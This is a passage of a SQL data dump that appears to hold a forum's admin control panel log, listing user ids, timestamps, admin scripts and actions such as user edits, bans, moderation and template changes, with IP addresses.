(1840, 100, 1452774353, 'forumpermission.php', 'edit', 'forum id = 16 / usergroup id = 2', '141.101.81.234'), (1841, 100, 1452774358, 'forumpermission.php', 'doupdate', '', '141.101.81.234'), (1842, 100, 1452774359, 'forumpermission.php', 'modify', 'forum id = 16', '141.101.81.234'), (1843, 100, 1452774367, 'forumpermission.php', 'edit', 'forumpermission id = 149', '141.101.81.234'), (1844, 100, 1452774371, 'forumpermission.php', 'doupdate', '', '141.101.81.234'), (1845, 100, 1452774372, 'forumpermission.php', 'modify', 'forum id = 14', '141.101.81.234'), (1846, 100, 1452774432, 'user.php', 'add', '', '141.101.81.234'), (1847, 100, 1452774459, 'user.php', 'update', '', '141.101.81.234'), (1848, 100, 1452774460, 'user.php', 'modify', 'user id = 382', '141.101.81.234'), (1849, 13, 1453511471, 'forum.php', 'modify', '', '162.158.17.66'), (1850, 13, 1453511479, 'user.php', 'find', '', '162.158.17.66'), (1851, 13, 1453511489, 'user.php', 'findnames', '', '162.158.17.66'), (1852, 13, 1453511496, 'user.php', 'reputation', 'user id = 13', '162.158.17.66'), (1853, 100, 1453533200, 'moderate.php', 'posts', '', '141.101.80.16'), (1854, 100, 1453533294, 'moderate.php', 'doposts', '', '141.101.80.16'), (1855, 100, 1453533296, 'moderate.php', 'posts', '', '141.101.80.16'), (1856, 100, 1453753486, 'moderate.php', 'posts', '', '141.101.81.20'), (1857, 1, 1453764514, 'subscriptions.php', 'transactions', '', '141.101.105.229'), (1858, 1, 1453764516, 'subscriptions.php', 'transactions', '', '141.101.105.229'), (1859, 1, 1453764520, 'subscriptions.php', 'transactions', '', '141.101.105.229'), (1860, 1, 1453764522, 'subscriptions.php', 'transactions', '', '141.101.105.229'), (1861, 1, 1453764523, 'subscriptions.php', 'transactions', '', '141.101.105.229'), (1862, 1, 1453764526, 'modlog.php', 'choose', '', '141.101.105.229'), (1863, 1, 1453764528, 'stats.php', 'index', '', '141.101.105.229'), (1864, 1, 1453764571, 'usertools.php', 'doips', '', '141.101.105.229'), (1865, 1, 1453764614, 'notice.php', 'modify', '', '141.101.105.229'), (1866, 1, 1453764621, 'verify.php', '', '', '141.101.105.229'), (1867, 1, 1453764623, 'bookmarksite.php', 'modify', '', '141.101.105.229'), (1868, 1, 1453764632, 'thread.php', 'prune', '', '141.101.105.229'), (1869, 1, 1453764634, 'thread.php', 'killpoll', '', '141.101.105.229'), (1870, 1, 1453764638, 'thread.php', 'votes', '', '141.101.105.229'), (1871, 1, 1453764641, 'thread.php', 'pruneedit', '', '141.101.105.229'), (1872, 1, 1453764647, 'prefix.php', '', '', '141.101.105.229'), (1873, 1, 1453764648, 'prefix.php', 'addset', '', '141.101.105.229'), (1874, 1, 1453764649, 'prefix.php', 'duplicate', '', '141.101.105.229'), (1875, 1, 1453764662, 'admininfraction.php', 'modify', '', '141.101.105.229'), (1876, 1, 1453764663, 'admininfraction.php', 'list', '', '141.101.105.229'), (1877, 1, 1453764666, 'admininfraction.php', 'dolist', 'infractionlevel id = -1', '141.101.105.229'), (1878, 100, 1453912545, 'user.php', 'add', '', '141.101.80.14'), (1879, 100, 1453912566, 'user.php', 'update', '', '141.101.80.14'), (1880, 100, 1453912567, 'user.php', 'modify', 'user id = 383', '141.101.80.14'), (1881, 100, 1453918057, 'moderate.php', 'posts', '', '141.101.80.14'), (1882, 100, 1453918061, 'moderate.php', 'posts', '', '141.101.80.14'), (1883, 100, 1453918077, 'moderate.php', 'doposts', '', '141.101.80.14'), (1884, 100, 1453918079, 'moderate.php', 'posts', '', '141.101.80.14'), (1885, 100, 1454296769, 'moderate.php', 'posts', '', '141.101.80.14'), (1886, 100, 1454296862, 'faq.php', '', '', '141.101.80.14'), (1887, 100, 1454296871, 'phrase.php', 'search', '', '141.101.80.14'), (1888, 100, 1454296874, 'phrase.php', 'dosearch', '', '141.101.80.14'), (1889, 100, 1454296969, 'options.php', 'searchtype', '', '141.101.80.14'), (1890, 100, 1454296975, 'verify.php', '', '', '141.101.80.14'), (1891, 100, 1454296982, 'template.php', 'search', '', '141.101.80.14'), (1892, 100, 1454296987, 'template.php', 'modify', '', '141.101.80.14'), (1893, 100, 1454296991, 'css.php', 'edit', 'style id = 2', '141.101.80.14'), (1894, 100, 1454297549, 'options.php', 'searchtype', '', '141.101.80.14'), (1895, 100, 1454297554, 'bookmarksite.php', 'modify', '', '141.101.80.14'), (1896, 100, 1454297558, 'verify.php', '', '', '141.101.80.14'), (1897, 100, 1454297560, 'template.php', 'search', '', '141.101.80.14'), (1898, 100, 1454297568, 'template.php', 'modify', '', '141.101.80.14'), (1899, 100, 1454297570, 'template.php', 'search', '', '141.101.80.14'), (1900, 100, 1454297574, 'phrase.php', 'search', '', '141.101.80.14'), (1901, 100, 1454297574, 'phrase.php', 'search', '', '141.101.80.14'), (1902, 100, 1454297578, 'phrase.php', 'dosearch', '', '141.101.80.14'), (1903, 100, 1454297597, 'phrase.php', 'edit', '', '141.101.80.14'), (1904, 100, 1454297605, 'phrase.php', 'search', '', '141.101.80.14'), (1905, 100, 1454297611, 'phrase.php', 'dosearch', '', '141.101.80.14'), (1906, 100, 1454297661, 'notice.php', 'modify', '', '141.101.80.14'), (1907, 100, 1454514526, 'user.php', 'modify', '', '141.101.81.4'), (1908, 100, 1454514529, 'user.php', 'find', '', '141.101.81.4'), (1909, 100, 1454514529, 'user.php', 'edit', 'user id = 383', '141.101.81.4'), (1910, 100, 1454514541, 'user.php', 'update', 'user id = 383', '141.101.81.4'), (1911, 100, 1454514543, 'user.php', 'modify', 'user id = 383', '141.101.81.4'), (1912, 100, 1454572857, 'user.php', 'find', '', '141.101.81.233'), (1913, 100, 1454572857, 'user.php', 'edit', 'user id = 182', '141.101.81.233'), (1914, 100, 1454572865, 'user.php', 'update', 'user id = 182', '141.101.81.233'), (1915, 100, 1454572866, 'user.php', 'modify', 'user id = 182', '141.101.81.233'), (1916, 13, 1454887197, 'user.php', 'viewuser', 'user id = 173', '162.158.89.39'), (1917, 13, 1454887209, 'forum.php', 'modify', '', '162.158.89.39'), (1918, 13, 1454887209, 'forum.php', 'modify', '', '162.158.89.39'), (1919, 13, 1454899026, 'announcement.php', 'add', '', '162.158.89.39'), (1920, 13, 1454899040, 'announcement.php', 'add', '', '162.158.89.39'), (1921, 13, 1454899041, 'forum.php', 'modify', '', '162.158.89.39'), (1922, 13, 1454899047, 'moderate.php', 'posts', '', '162.158.89.39'), (1923, 13, 1454899047, 'moderate.php', 'posts', '', '162.158.89.39'), (1924, 13, 1454899065, 'announcement.php', 'add', '', '162.158.89.39'), (1925, 13, 1454899065, 'announcement.php', 'add', '', '162.158.89.39'), (1926, 13, 1454899067, 'forum.php', 'modify', '', '162.158.89.39'), (1927, 13, 1454899069, 'moderate.php', 'posts', '', '162.158.89.39'), (1928, 13, 1454899080, 'forum.php', 'modify', '', '162.158.89.39'), (1929, 13, 1454899134, 'moderate.php', 'posts', '', '162.158.89.39'), (1930, 13, 1454899171, 'moderate.php', 'posts', '', '162.158.89.39'), (1931, 13, 1454899366, 'moderate.php', 'posts', '', '162.158.89.39'), (1932, 13, 1454899366, 'moderate.php', 'posts', '', '162.158.89.39'), (1933, 13, 1454899378, 'moderate.php', 'attachments', '', '162.158.89.39'), (1934, 13, 1454899380, 'moderate.php', 'events', '', '162.158.89.39'), (1935, 13, 1454899381, 'moderate.php', 'messages', '', '162.158.89.39'), (1936, 13, 1454899383, 'moderate.php', 'messages', '', '162.158.89.39'), (1937, 13, 1454899383, 'user.php', 'find', '', '162.158.89.39'), (1938, 13, 1454899391, 'banning.php', 'banuser', '', '162.158.89.39'), (1939, 13, 1454899394, 'banning.php', 'modify', '', '162.158.89.39'), (1940, 13, 1454899404, 'user.php', 'doips', '', '162.158.89.39'), (1941, 13, 1454899407, 'announcement.php', 'add', '', '162.158.89.39'), (1942, 13, 1454899408, 'forum.php', 'modify', '', '162.158.89.39'), (1943, 13, 1454899418, 'announcement.php', 'add', '', '162.158.89.39'), (1944, 13, 1454899421, 'forum.php', 'modify', '', '162.158.89.39'), (1945, 13, 1454899423, 'forum.php', 'editpassword', 'forum id = 7', '162.158.89.39'), (1946, 13, 1454899427, 'forum.php', 'modify', '', '162.158.89.39'), (1947, 13, 1454899433, 'forum.php', 'modify', '', '162.158.89.39'), (1948, 13, 1454899440, 'user.php', 'doips', '', '162.158.89.39'), (1949, 13, 1454899441, 'banning.php', 'modify', '', '162.158.89.39'), (1950, 13, 1454899455, 'user.php', 'viewuser', 'user id = 173', '162.158.89.39'), (1951, 13, 1454899470, 'user.php', 'avatar', 'user id = 173', '162.158.89.39'), (1952, 13, 1454899472, 'user.php', 'viewuser', 'user id = 173', '162.158.89.39'), (1953, 13, 1454899496, 'banning.php', 'modify', '', '162.158.89.39'), (1954, 13, 1454899498, 'user.php', 'viewuser', 'user id = 173', '162.158.89.39'), (1955, 13, 1454899515, 'user.php', 'viewuser', 'user id = 173', '162.158.89.39'), (1956, 13, 1454899519, 'user.php', 'viewuser', 'user id = 173', '162.158.89.39'), (1957, 13, 1454899522, 'user.php', 'viewuser', 'user id = 173', '162.158.89.39'), (1958, 13, 1454899524, 'banning.php', 'modify', '', '162.158.89.39'), (1959, 13, 1454899524, 'banning.php', 'modify', '', '162.158.89.39'), (1960, 13, 1454899526, 'user.php', 'viewuser', 'user id = 173', '162.158.89.39'), (1961, 13, 1454899534, 'user.php', 'find', '', '162.158.89.39'), (1962, 13, 1454899535, 'moderate.php', 'messages', '', '162.158.89.39'), (1963, 13, 1454899536, 'moderate.php', 'events', '', '162.158.89.39'), (1964, 13, 1454899538, 'moderate.php', 'attachments', '', '162.158.89.39'), (1965, 13, 1454899540, 'moderate.php', 'posts', '', '162.158.89.39'), (1966, 13, 1454899563, 'user.php', 'find', '', '162.158.89.39'), (1967, 13, 1454899565, 'announcement.php', 'add', '', '162.158.89.39'), (1968, 13, 1454899565, 'announcement.php', 'add', '', '162.158.89.39'), (1969, 13, 1454899566, 'user.php', 'find', '', '162.158.89.39'), (1970, 13, 1454899571, 'user.php', 'findnames', '', '162.158.89.39'), (1971, 13, 1454899577, 'user.php', 'reputation', 'user id = 1', '162.158.89.39'), (1972, 13, 1454899578, 'user.php', 'viewuser', 'user id = 1', '162.158.89.39'), (1973, 13, 1454899586, 'user.php', 'viewuser', 'user id = 1', '162.158.89.39'), (1974, 13, 1454899596, 'user.php', 'profilepic', 'user id = 1', '162.158.89.39'), (1975, 13, 1454899600, 'user.php', 'reputation', 'user id = 1', '162.158.89.39'), (1976, 13, 1454899604, 'user.php', 'editsig', 'user id = 1', '162.158.89.39'), (1977, 13, 1454899605, 'user.php', 'viewuser', 'user id = 1', '162.158.89.39'), (1978, 13, 1454899607, 'banning.php', 'banuser', '', '162.158.89.39'), (1979, 13, 1454899989, 'user.php', 'viewuser', 'user id = 344', '162.158.89.39'), (1980, 13, 1454900061, 'user.php', 'viewuser', 'user id = 100', '162.158.89.39'), (1981, 13, 1454961975, 'announcement.php', 'add', '', '162.158.88.16'), (1982, 13, 1454961975, 'announcement.php', 'add', '', '162.158.88.16'), (1983, 13, 1454961977, 'forum.php', 'modify', '', '162.158.88.16'), (1984, 13, 1454961977, 'forum.php', 'modify', '', '162.158.88.16'), (1985, 13, 1454962283, 'user.php', 'viewuser', 'user id = 13', '162.158.88.16'), (1986, 13, 1454962317, 'moderate.php', 'posts', '', '162.158.88.16'), (1987, 13, 1454962321, 'moderate.php', 'posts', '', '162.158.88.16'), (1988, 13, 1454962327, 'moderate.php', 'attachments', '', '162.158.88.16'), (1989, 13, 1454962327, 'moderate.php', 'attachments', '', '162.158.88.16'), (1990, 13, 1454962330, 'moderate.php', 'posts', '', '162.158.88.16'), (1991, 13, 1454962360, 'user.php', 'viewuser', 'user id = 1', '162.158.88.16'), (1992, 13, 1454973541, 'announcement.php', 'add', '', '162.158.88.16'), (1993, 13, 1454973541, 'announcement.php', 'add', '', '162.158.88.16'), (1994, 13, 1454973544, 'forum.php', 'modify', '', '162.158.88.16'), (1995, 13, 1454973544, 'forum.php', 'modify', '', '162.158.88.16'), (1996, 13, 1455297388, 'moderate.php', 'posts', '', '162.158.89.39'), (1997, 13, 1455297393, 'announcement.php', 'add', '', '162.158.89.39'), (1998, 13, 1455297394, 'forum.php', 'modify', '', '162.158.89.39'), (1999, 13, 1455323848, 'announcement.php', 'add', '', '162.158.89.39'), (2000, 13, 1455323852, 'announcement.php', 'add', '', '162.158.89.39'), (2001, 13, 1455323855, 'announcement.php', 'add', '', '162.158.89.39'), (2002, 13, 1455323860, 'forum.php', 'modify', '', '162.158.89.39'), (2003, 13, 1455323909, 'forum.php', 'editpassword', 'forum id = 7', '162.158.89.39'), (2004, 13, 1455323931, 'forum.php', 'modify', '', '162.158.89.39'), (2005, 13, 1455324290, 'user.php', 'viewuser', 'user id = 100', '162.158.89.39'), (2006, 13, 1455324306, 'thread.php', 'prune', '', '162.158.89.39'), (2007, 13, 1455324312, 'thread.php', 'move', '', '162.158.89.39'), (2008, 13, 1455324315, 'banning.php', 'modify', '', '162.158.89.39'), (2009, 13, 1455324318, 'banning.php', 'modify', '', '162.158.89.39'), (2010, 13, 1455324318, 'banning.php', 'modify', '', '162.158.89.39'), (2011, 13, 1455324330, 'user.php', 'doips', '', '162.158.89.39'), (2012, 13, 1455324330, 'user.php', 'doips', '', '162.158.89.39'), (2013, 13, 1455324331, 'banning.php', 'banuser', '', '162.158.89.39'), (2014, 13, 1455324333, 'user.php', 'find', '', '162.158.89.39'), (2015, 13, 1455324334, 'moderate.php', 'messages', '', '162.158.89.39'), (2016, 13, 1455324334, 'moderate.php', 'messages', '', '162.158.89.39'), (2017, 13, 1455324335, 'moderate.php', 'events', '', '162.158.89.39'), (2018, 13, 1455324336, 'moderate.php', 'attachments', '', '162.158.89.39'), (2019, 13, 1455324337, 'moderate.php', 'posts', '', '162.158.89.39'), (2020, 13, 1455324341, 'moderate.php', 'posts', '', '162.158.89.39'), (2021, 13, 1455324344, 'forum.php', 'modify', '', '162.158.89.39'), (2022, 13, 1455324345, 'announcement.php', 'add', '', '162.158.89.39'), (2023, 13, 1455324345, 'announcement.php', 'add', '', '162.158.89.39'), (2024, 13, 1455324389, 'announcement.php', 'add', '', '162.158.88.16'), (2025, 13, 1455324389, 'announcement.php', 'add', '', '162.158.88.16'), (2026, 13, 1455324391, 'forum.php', 'modify', '', '162.158.88.16'), (2027, 13, 1455324391, 'forum.php', 'modify', '', '162.158.88.16'), (2028, 13, 1455324397, 'announcement.php', 'add', '', '162.158.88.16'), (2029, 13, 1455324402, 'announcement.php', 'add', '', '162.158.88.16'), (2030, 13, 1455324414, 'announcement.php', 'add', '', '162.158.88.16'), (2031, 13, 1455324457, 'moderate.php', 'attachments', '', '162.158.88.16'), (2032, 13, 1455324457, 'moderate.php', 'attachments', '', '162.158.88.16'), (2033, 13, 1455556907, 'forum.php', 'modify', '', '162.158.88.16'), (2034, 13, 1455813102, 'announcement.php', 'add', '', '162.158.88.16'), (2035, 13, 1455813102, 'announcement.php', 'add', '', '162.158.88.16'), (2036, 13, 1455813104, 'moderate.php', 'posts', '', '162.158.88.16'), (2037, 13, 1455813105, 'moderate.php', 'posts', '', '162.158.88.16'), (2038, 13, 1455813106, 'moderate.php', 'attachments', '', '162.158.88.16'), (2039, 13, 1455813106, 'moderate.php', 'attachments', '', '162.158.88.16'), (2040, 13, 1455813108, 'moderate.php', 'posts', '', '162.158.88.16'), (2041, 13, 1455813109, 'moderate.php', 'attachments', '', '162.158.88.16'), (2042, 13, 1455813109, 'moderate.php', 'attachments', '', '162.158.88.16'), (2043, 13, 1455813110, 'moderate.php', 'events', '', '162.158.88.16'), (2044, 13, 1455813112, 'moderate.php', 'messages', '', '162.158.88.16'), (2045, 13, 1455813112, 'moderate.php', 'messages', '', '162.158.88.16'), (2046, 13, 1455813114, 'announcement.php', 'add', '', '162.158.88.16'), (2047, 13, 1455813114, 'announcement.php', 'add', '', '162.158.88.16'), (2048, 13, 1455813115, 'forum.php', 'modify', '', '162.158.88.16'), (2049, 13, 1455813115, 'forum.php', 'modify', '', '162.158.88.16'), (2050, 13, 1455965986, 'moderate.php', 'posts', '', '162.158.88.16'), (2051, 13, 1455965986, 'moderate.php', 'posts', '', '162.158.88.16'), (2052, 13, 1455965991, 'announcement.php', 'add', '', '162.158.88.16'), (2053, 13, 1455965991, 'announcement.php', 'add', '', '162.158.88.16'), (2054, 13, 1455965992, 'forum.php', 'modify', '', '162.158.88.16'), (2055, 13, 1455965992, 'forum.php', 'modify', '', '162.158.88.16'), (2056, 13, 1455968465, 'moderate.php', 'posts', '', '162.158.88.16'), (2057, 13, 1455968465, 'moderate.php', 'posts', '', '162.158.88.16'), (2058, 13, 1455968468, 'moderate.php', 'attachments', '', '162.158.88.16'), (2059, 13, 1455968468, 'moderate.php', 'attachments', '', '162.158.88.16'), (2060, 13, 1455968472, 'announcement.php', 'add', '', '162.158.88.16'), (2061, 13, 1455968472, 'announcement.php', 'add', '', '162.158.88.16'), (2062, 13, 1455968473, 'forum.php', 'modify', '', '162.158.88.16'), (2063, 13, 1455968474, 'forum.php', 'modify', '', '162.158.88.16'), (2064, 100, 1456049907, 'user.php', 'find', '', '141.101.81.21'), (2065, 100, 1456049907, 'user.php', 'edit', '', '141.101.81.21'), (2066, 100, 1456049918, 'user.php', 'find', '', '141.101.81.21'), (2067, 100, 1456049918, 'user.php', 'edit', '', '141.101.81.21'), (2068, 100, 1456050012, 'user.php', 'edit', 'user id = 13', '141.101.81.21'), (2069, 100, 1456050034, 'user.php', 'update', 'user id = 13', '141.101.81.21'), (2070, 100, 1456050035, 'user.php', 'modify', 'user id = 13', '141.101.81.21'), (2071, 100, 1456057483, 'user.php', 'edit', 'user id = 173', '141.101.80.18'), (2072, 100, 1456057501, 'user.php', 'update', 'user id = 173', '141.101.80.18'), (2073, 100, 1456057503, 'user.php', 'modify', 'user id = 173', '141.101.80.18'), (2074, 100, 1456057508, 'user.php', 'modify', 'user id = 173', '141.101.80.18'), (2075, 100, 1456067092, 'moderate.php', 'posts', '', '141.101.80.18'), (2076, 100, 1456128104, 'user.php', 'edit', 'user id = 173', '141.101.80.21'), (2077, 100, 1456128132, 'user.php', 'update', 'user id = 173', '141.101.80.21'), (2078, 100, 1456128133, 'user.php', 'modify', 'user id = 173', '141.101.80.21'), (2079, 1, 1456159893, 'user.php', 'add', '', '141.101.104.54'), (2080, 1, 1456159955, 'user.php', 'update', '', '141.101.104.54'), (2081, 1, 1456159956, 'user.php', 'modify', 'user id = 384', '141.101.104.54'), (2082, 1, 1456159963, 'user.php', 'find', '', '141.101.104.54'), (2083, 1, 1456159964, 'user.php', 'find', '', '141.101.104.54'), (2084, 1, 1456159965, 'user.php', 'find', '', '141.101.104.54'), (2085, 1, 1456159966, 'user.php', 'find', '', '141.101.104.54'), (2086, 1, 1456159967, 'user.php', 'find', '', '141.101.104.54'), (2087, 1, 1456159968, 'user.php', 'find', '', '141.101.104.54'), (2088, 1, 1456159969, 'user.php', 'find', '', '141.101.104.54'), (2089, 1, 1456159969, 'user.php', 'find', '', '141.101.104.54'), (2090, 1, 1456159970, 'user.php', 'find', '', '141.101.104.54'), (2091, 1, 1456159971, 'user.php', 'find', '', '141.101.104.54'), (2092, 1, 1456159973, 'user.php', 'find', '', '141.101.104.54'), (2093, 100, 1456188246, 'user.php', 'edit', 'user id = 384', '141.101.80.7'), (2094, 100, 1456188264, 'user.php', 'update', 'user id = 384', '141.101.80.7'), (2095, 100, 1456188265, 'user.php', 'modify', 'user id = 384', '141.101.80.7'), (2096, 1, 1456220738, 'user.php', 'modify', '', '141.101.104.54'), (2097, 1, 1456220739, 'user.php', 'find', '', '141.101.104.54'), (2098, 1, 1456220741, 'user.php', 'find', '', '141.101.104.54'), (2099, 1, 1456220741, 'user.php', 'find', '', '141.101.104.54'), (2100, 1, 1456220742, 'user.php', 'find', '', '141.101.104.54'), (2101, 1, 1456220743, 'user.php', 'find', '', '141.101.104.54'), (2102, 1, 1456220744, 'user.php', 'find', '', '141.101.104.54'), (2103, 1, 1456220745, 'user.php', 'find', '', '141.101.104.54'), (2104, 1, 1456220745, 'user.php', 'find', '', '141.101.104.54'), (2105, 1, 1456220746, 'user.php', 'find', '', '141.101.104.54'), (2106, 1, 1456220747, 'user.php', 'find', '', '141.101.104.54'), (2107, 1, 1456220749, 'user.php', 'find', '', '141.101.104.54'), (2108, 1, 1456220760, 'user.php', 'edit', 'user id = 384', '141.101.104.54'), (2109, 1, 1456220834, 'user.php', 'update', 'user id = 384', '141.101.104.54'), (2110, 1, 1456220835, 'user.php', 'modify', 'user id = 384', '141.101.104.54'), (2111, 1, 1456220879, 'user.php', 'edit', 'user id = 384', '141.101.104.54'), (2112, 100, 1456230873, 'user.php', 'modify', '', '188.114.103.247'), (2113, 100, 1456230882, 'user.php', 'find', '', '188.114.103.247'), (2114, 100, 1456230883, 'user.php', 'find', '', '188.114.103.247'), (2115, 100, 1456230885, 'user.php', 'find', '', '188.114.103.247'), (2116, 100, 1456230890, 'usertools.php', 'doips', '', '188.114.103.247'), (2117, 100, 1456230921, 'user.php', 'find', '', '188.114.103.247'), (2118, 100, 1456230931, 'user.php', 'find', '', '188.114.103.247'), (2119, 100, 1456230941, 'user.php', 'find', '', '188.114.103.247'), (2120, 100, 1456230950, 'user.php', 'find', '', '188.114.103.247'), (2121, 100, 1456230960, 'user.php', 'find', '', '188.114.103.247'), (2122, 100, 1456230970, 'user.php', 'find', '', '188.114.103.247'), (2123, 100, 1456230983, 'user.php', 'find', '', '188.114.103.247'), (2124, 100, 1456230992, 'user.php', 'find', '', '188.114.103.247'), (2125, 100, 1456231002, 'user.php', 'find', '', '188.114.103.247'), (2126, 100, 1456231011, 'user.php', 'find', '', '188.114.103.247'), (2127, 100, 1456231020, 'user.php', 'find', '', '188.114.103.247'), (2128, 100, 1456231030, 'user.php', 'find', '', '188.114.103.247'), (2129, 100, 1456231039, 'user.php', 'find', '', '188.114.103.247'), (2130, 100, 1456232638, 'user.php', 'find', '', '188.114.103.247'), (2131, 100, 1456232664, 'user.php', 'edit', '', '188.114.103.247'), (2132, 100, 1456232689, 'user.php', 'edit', '', '188.114.103.247'), (2133, 100, 1456232804, 'user.php', 'update', '', '188.114.103.247'), (2134, 100, 1456232820, 'user.php', 'find', '', '188.114.103.247'), (2135, 100, 1456232873, 'notice.php', 'modify', '', '188.114.103.247'), (2136, 100, 1456232922, 'notice.php', 'add', '', '188.114.103.247'), (2137, 100, 1456232962, 'forum.php', 'modify', '', '188.114.103.247'), (2138, 100, 1456232988, 'forumpermission.php', 'modify', '', '188.114.103.247'), (2139, 100, 1456232995, 'resources.php', '', '', '188.114.103.247'), (2140, 100, 1456233013, 'banning.php', 'banuser', '', '188.114.103.247'), (2141, 100, 1456233024, 'user.php', 'modify', '', '188.114.103.247'), (2142, 100, 1456233040, 'user.php', 'prune', '', '188.114.103.247'), (2143, 100, 1456233045, 'banning.php', 'modify', '', '188.114.103.247'), (2144, 100, 1456233059, 'user.php', 'add', '', '188.114.103.247'), (2145, 100, 1456233061, 'user.php', 'modify', '', '188.114.103.247'), (2146, 100, 1456233065, 'user.php', 'find', '', '188.114.103.247'), (2147, 100, 1456233100, 'user.php', 'remove', 'user id = 160', '188.114.103.247'), (2148, 100, 1456233107, 'user.php', 'kill', 'user id = 160', '188.114.103.247'), (2149, 100, 1456233109, 'user.php', 'modify', '', '188.114.103.247'), (2150, 100, 1456233111, 'user.php', 'find', '', '188.114.103.247'), (2151, 100, 1456233128, 'user.php', 'find', '', '188.114.103.247'), (2152, 100, 1456233164, 'user.php', 'find', '', '188.114.103.247'), (2153, 100, 1456233171, 'user.php', 'find', '', '188.114.103.247'), (2154, 100, 1456233216, 'user.php', 'find', '', '188.114.103.247'), (2155, 100, 1456233226, 'user.php', 'remove', 'user id = 249', '188.114.103.247'), (2156, 100, 1456233228, 'user.php', 'kill', 'user id = 249', '188.114.103.247'), (2157, 100, 1456233229, 'user.php', 'modify', '', '188.114.103.247'), (2158, 100, 1456233231, 'user.php', 'find', '', '188.114.103.247'), (2159, 100, 1456233245, 'user.php', 'find', '', '188.114.103.247'), (2160, 100, 1456233247, 'user.php', 'find', '', '188.114.103.247'), (2161, 100, 1456233249, 'user.php', 'find', '', '188.114.103.247'), (2162, 100, 1456233900, 'user.php', 'find', '', '188.114.103.247'), (2163, 100, 1456233917, 'user.php', 'find', '', '188.114.103.247'), (2164, 100, 1456233932, 'user.php', 'find', '', '188.114.103.247'), (2165, 100, 1456233946, 'user.php', 'find', '', '188.114.103.247'), (2166, 100, 1456234066, 'user.php', 'find', '', '188.114.103.247'), (2167, 100, 1456234079, 'user.php', 'find', '', '188.114.103.247'), (2168, 100, 1456234086, 'user.php', 'find', '', '188.114.103.247'), (2169, 100, 1456234095, 'user.php', 'remove', 'user id = 168', '188.114.103.247'), (2170, 100, 1456234327, 'attachment.php', 'types', '', '162.158.88.10'), (2171, 100, 1456234335, 'attachment.php', 'updatetype', '', '162.158.88.10'), (2172, 100, 1456234817, 'attachment.php', 'updatetype', '', '162.158.88.10'), (2173, 100, 1456234842, 'attachment.php', 'doupdatetype', '', '162.158.88.10'), (2174, 100, 1456234843, 'attachment.php', 'types', '', '162.158.88.10'), (2175, 100, 1456234856, 'moderate.php', 'posts', '', '162.158.88.10'), (2176, 1, 1456238078, 'options.php', '', '', '141.101.104.54'), (2177, 1, 1456238082, 'template.php', 'modify', '', '141.101.104.54'), (2178, 1, 1456238093, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2179, 1, 1456238175, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2180, 1, 1456238178, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2181, 1, 1456238189, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2182, 1, 1456238248, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2183, 1, 1456238259, 'forum.php', 'modify', '', '141.101.104.54'), (2184, 1, 1456238272, 'forum.php', 'edit', 'forum id = 32', '141.101.104.54'), (2185, 1, 1456238289, 'template.php', 'modify', '', '141.101.104.54'), (2186, 1, 1456238292, 'template.php', 'search', '', '141.101.104.54'), (2187, 1, 1456238302, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2188, 1, 1456238314, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2189, 1, 1456238322, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2190, 1, 1456238333, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2191, 1, 1456238339, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2192, 1, 1456238343, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2193, 1, 1456238345, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2194, 1, 1456238349, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2195, 1, 1456238352, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2196, 1, 1456238354, 'template.php', 'replace', 'style id = -1', '141.101.104.54'), (2197, 1, 1456238359, 'template.php', 'search', '', '141.101.104.54'), (2198, 1, 1456238363, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2199, 1, 1456238375, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2200, 1, 1456238380, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2201, 1, 1456238387, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2202, 1, 1456238395, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2203, 1, 1456238399, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2204, 1, 1456238404, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2205, 1, 1456238406, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2206, 1, 1456238407, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2207, 1, 1456238408, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2208, 1, 1456238411, 'template.php', 'replace', 'style id = 2', '141.101.104.54'), (2209, 1, 1456238418, 'template.php', 'modify', '', '141.101.104.54'), (2210, 1, 1456238426, 'template.php', 'add', 'style id = 2', '141.101.104.54'), (2211, 1, 1456238432, 'template.php', 'modify', '', '141.101.104.54'), (2212, 1, 1456238470, 'template.php', 'editstyle', 'style id = 2', '141.101.104.54'), (2213, 1, 1456238481, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2214, 1, 1456238500, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2215, 1, 1456238517, 'css.php', 'edit', 'style id = 2', '141.101.104.54'), (2216, 1, 1456238546, 'thread.php', 'prune', '', '141.101.104.54'), (2217, 1, 1456238552, 'prefix.php', '', '', '141.101.104.54'), (2218, 1, 1456238558, 'prefix.php', 'addset', '', '141.101.104.54'), (2219, 1, 1456238574, 'image.php', 'modify', 'Post Icons', '141.101.104.54'), (2220, 1, 1456238576, 'image.php', 'viewimages', 'Post Icons', '141.101.104.54'), (2221, 1, 1456238586, 'image.php', 'displayorder', 'Post Icons', '141.101.104.54'), (2222, 1, 1456238601, 'image.php', 'modify', 'Smilies', '141.101.104.54'), (2223, 1, 1456238603, 'image.php', 'viewimages', 'Smilies', '141.101.104.54'), (2224, 1, 1456238609, 'bbcode.php', 'modify', '', '141.101.104.54'), (2225, 1, 1456238625, 'forum.php', 'modify', '', '141.101.104.54'), (2226, 1, 1456238635, 'forum.php', 'podcast', 'forum id = 32', '141.101.104.54'), (2227, 1, 1456238656, 'forum.php', 'edit', 'forum id = 32', '141.101.104.54'), (2228, 1, 1456238671, 'forum.php', 'update', 'forum id = 32', '141.101.104.54'), (2229, 1, 1456238672, 'forum.php', 'modify', 'forum id = 32', '141.101.104.54'), (2230, 1, 1456238690, 